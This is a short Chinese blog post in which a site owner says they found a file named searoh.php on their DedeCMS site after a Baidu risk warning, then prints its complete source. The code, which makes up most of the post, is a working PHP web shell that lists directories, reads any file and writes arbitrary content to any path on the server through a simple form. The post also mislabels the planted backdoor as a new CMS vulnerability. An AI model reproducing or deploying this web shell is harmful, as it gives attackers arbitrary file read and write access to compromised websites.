织梦新漏洞searoh.php可读取写入文件,获取网站的栏目能知道网站所有的目录。这两天在网站被百度举报,显示风险提示。于是就开始找木马文件。
经过认真的排查终于找到一个名称为searoh.php的php文件。运行这个文件可以得到下面的结果,能获取网站的栏目,同时也可以再网站里面写入木马。实在可怕。
下面我来共享这个文件的源码。
<?
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc())
{
foreach($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
}
$data="";
if(!empty($_POST['action']))
{
if ($_POST['action']=="读取")
{
if(!empty($_POST['file']))
{
if(is_dir($_POST['file']))
{
$dir=opendir($_POST['file']);
while(($file=readdir($dir))!==false)
{
$data=$data.$file."/r/n";
}
closedir($dir);
}
else if(is_file($_POST['file']))
{
$fp=@fopen($_POST['file'],'r');
$data=@fread($fp,filesize($_POST['file']));
$data=str_replace("&","&",$data);
$data=str_replace('"',""",$data);
$data=str_replace("'","'",$data);
$data=str_replace("<","<",$data);
$data=str_replace(">",">",$data);
@fclose($fp);
}
}
}
elseif ($_POST['action']=="写入")
{
if(!empty($_POST['file']) && !empty($_POST['data']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['data']) ? '写入成功!' : '写入失败!';
@fclose($fp);
}
}
}
?>
<form method="POST">
绝对路径: <input type="text" name="file" size="60" value="<? echo str_replace(basename(__FILE__),"",str_replace('//','/',__FILE__)) ?>">
<br><br>
<textarea name="data" COLS="70" ROWS="18" ><?php echo $data?></textarea>
<br><br>
<input type="submit" name="action" value="读取">
<input type="submit" name="action" value="写入">
</form>
支付宝扫码打赏
微信扫码打赏
如果本文对你有帮助,欢迎打赏本站
